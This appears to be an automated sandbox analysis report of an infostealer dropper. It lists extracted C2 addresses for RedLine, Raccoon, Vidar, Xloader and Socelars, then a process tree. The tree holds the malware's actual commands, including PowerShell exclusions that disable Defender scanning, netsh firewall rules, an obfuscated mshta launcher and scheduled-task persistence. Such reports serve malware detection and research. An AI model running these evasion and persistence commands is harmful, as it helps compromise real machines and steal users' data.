Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
226s -
max time network
1205s -
platform
windows10_x64 -
resource
win10-de-20211014 -
submitted
08/11/2021, 16:12
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Extracted
Family
raccoon
Version
1.8.3-hotfix
Botnet
19425a9ea527ab0b3a94d8156a7d2f62d79d3b73
Attributes
-
url4cnc
http://91.219.236.162/bimboDinotrex
http://185.163.47.176/bimboDinotrex
http://193.38.54.238/bimboDinotrex
http://74.119.192.122/bimboDinotrex
http://91.219.236.240/bimboDinotrex
https://t.me/bimboDinotrex
rc4.plain
rc4.plain
Extracted
Family
redline
C2
45.9.20.149:10844
Extracted
Family
vidar
Version
48.1
Botnet
937
C2
https://koyu.space/@rspich
Attributes
-
profile_id
937
Extracted
Family
redline
Botnet
udptest
C2
193.56.146.64:65441
Extracted
Family
vidar
Version
47.9
Botnet
933
C2
https://mas.to/@kirpich
Attributes
-
profile_id
933
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Arkei Stealer Payload 2 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
Xloader Payload 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 50 IoCs
-
Modifies Windows Firewall 1 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 7 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 10 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
-
NSIS installer 6 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\MGF06eWV2QxiQ3cG6az4tr31.exe"C:\Users\Admin\Pictures\Adobe Films\MGF06eWV2QxiQ3cG6az4tr31.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\4N57m2SeL5IiTI5AG0oY8LBW.exe"C:\Users\Admin\Pictures\Adobe Films\4N57m2SeL5IiTI5AG0oY8LBW.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe"C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
-
C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe" /SpecialRun 4101d8 51365⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe" /SpecialRun 4101d8 55045⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force4⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run5⤵
-
C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe" /SpecialRun 4101d8 77166⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run5⤵
-
C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe" /SpecialRun 4101d8 78166⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force5⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i_L0A7LldAXrsKpzFi5txJoI.exe"C:\Users\Admin\Pictures\Adobe Films\i_L0A7LldAXrsKpzFi5txJoI.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe"C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PWokcJndamMPSc5Glm9GSVbb.exe"C:\Users\Admin\Pictures\Adobe Films\PWokcJndamMPSc5Glm9GSVbb.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\YyH9SXCqivTrzrPqI3uYJQMd.exe"C:\Users\Admin\Pictures\Adobe Films\YyH9SXCqivTrzrPqI3uYJQMd.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\owY_g7gf7wrPiXIfc88VlEqk.exe"C:\Users\Admin\Documents\owY_g7gf7wrPiXIfc88VlEqk.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\KL1Sx3zXL9dnl28s_DQkjbNj.exe"C:\Users\Admin\Pictures\Adobe Films\KL1Sx3zXL9dnl28s_DQkjbNj.exe"5⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe"C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "CeBYnvzipyGi9VupnEIWHAbX.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "CeBYnvzipyGi9VupnEIWHAbX.exe" /f7⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ejydHrY4wIQ47KBH15LRNvQg.exe"C:\Users\Admin\Pictures\Adobe Films\ejydHrY4wIQ47KBH15LRNvQg.exe"5⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\EYknBp1ulqVoJD36nUNXUOxq.exe"C:\Users\Admin\Pictures\Adobe Films\EYknBp1ulqVoJD36nUNXUOxq.exe"5⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "XEtFW6y9YZZi1S7OT_rg9zA7.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TTp54AqS3Xeuh140DQWkoEDm.exe"C:\Users\Admin\Pictures\Adobe Films\TTp54AqS3Xeuh140DQWkoEDm.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1b4,0x1f8,0x7ffbfd07dec0,0x7ffbfd07ded0,0x7ffbfd07dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6bf1f9e70,0x7ff6bf1f9e80,0x7ff6bf1f9e909⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,4159062920383515488,13865095438280234276,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8876_1082268702" --mojo-platform-channel-handle=1672 /prefetch:88⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe"C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J72BE.tmp\7jBCszsahJM8XJ50JwHaOcRd.tmp"C:\Users\Admin\AppData\Local\Temp\is-J72BE.tmp\7jBCszsahJM8XJ50JwHaOcRd.tmp" /SL5="$105B6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NCTT6.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-NCTT6.tmp\DYbALA.exe" /S /UID=27097⤵
-
C:\Users\Admin\AppData\Local\Temp\02-6d479-efd-d60ae-44e8f7f89a29d\Kunupyzhylo.exe"C:\Users\Admin\AppData\Local\Temp\02-6d479-efd-d60ae-44e8f7f89a29d\Kunupyzhylo.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 22529⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\8c-af29a-a38-d6a8f-9e7af29f56b3e\Jaguxaebipae.exe"C:\Users\Admin\AppData\Local\Temp\8c-af29a-a38-d6a8f-9e7af29f56b3e\Jaguxaebipae.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exe /eufive10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exeC:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exe /qn CAMPAIGN="654"10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exeC:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe"C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe" -u11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exe /mixfive10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n3y23sgf.gyd\autosubplayer.exe /S & exit9⤵
-
-
-
C:\Program Files\Common Files\PELOFRMUMU\foldershare.exe"C:\Program Files\Common Files\PELOFRMUMU\foldershare.exe" /VERYSILENT8⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pg3sBy27n_S5EnZhSjwDf610.exe"C:\Users\Admin\Pictures\Adobe Films\pg3sBy27n_S5EnZhSjwDf610.exe"5⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe"C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe"C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe" -u6⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CmP8WQcQIe09qWeNkvEOhtAh.exe"C:\Users\Admin\Pictures\Adobe Films\CmP8WQcQIe09qWeNkvEOhtAh.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe"C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\B6Bw0roWFP55xUoOvHs45zOz.exe"C:\Users\Admin\Pictures\Adobe Films\B6Bw0roWFP55xUoOvHs45zOz.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe"C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "XLxRmbPcDQ4F7J32lIdFDeny.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "XLxRmbPcDQ4F7J32lIdFDeny.exe" /f5⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe"C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \5⤵
-
-
